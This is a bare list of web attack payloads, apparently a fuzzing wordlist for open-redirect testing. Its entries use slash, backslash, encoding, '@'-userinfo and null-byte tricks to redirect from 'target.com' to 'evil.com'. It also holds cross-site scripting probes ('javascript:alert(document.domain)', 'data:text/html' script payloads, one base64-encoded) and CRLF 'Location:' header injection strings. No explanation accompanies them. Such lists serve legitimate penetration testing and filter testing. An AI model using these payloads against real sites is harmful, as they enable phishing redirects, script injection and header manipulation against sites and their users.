//evil.com
///evil.com
////evil.com
/\/evil.com
/\evil.com
//evil.com/%2f..
///evil.com/%2f..
//%0d%0aevil.com
//evil.com?
//evil.com#
//evil%2ecom
//evil。com
//evil.com\@target.com
//evil.com%00.target.com
//evil.com%0a.target.com
//evil.com%0d.target.com
//evil.com%09.target.com
//evil.com%23.target.com
/\x08//evil.com
/http://evil.com
https://evil.com
https:evil.com
http:evil.com
http://evil.com
http://evil.com%80@target.com
https://evil.com%80@target.com
http://target.com@evil.com
https://target.com@evil.com
http://target.com%40evil.com
http://target.com#@evil.com
http://target.com:80@evil.com
http://target.com%2f@evil.com
javascript:alert(document.domain)//
javascript://evil.com/%250aalert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
%0d%0aLocation: http://evil.com
%0aLocation: http://evil.com
%00//evil.com
%19//evil.com
%1f//evil.com
%2f%2fevil.com
%2f%5cevil.com
%5c%5cevil.com
%68%74%74%70%3a%2f%2fevil.com
\.evil.com
..evil.com
/...evil.com
/%09/evil.com
/%2f/evil.com
/evil.com
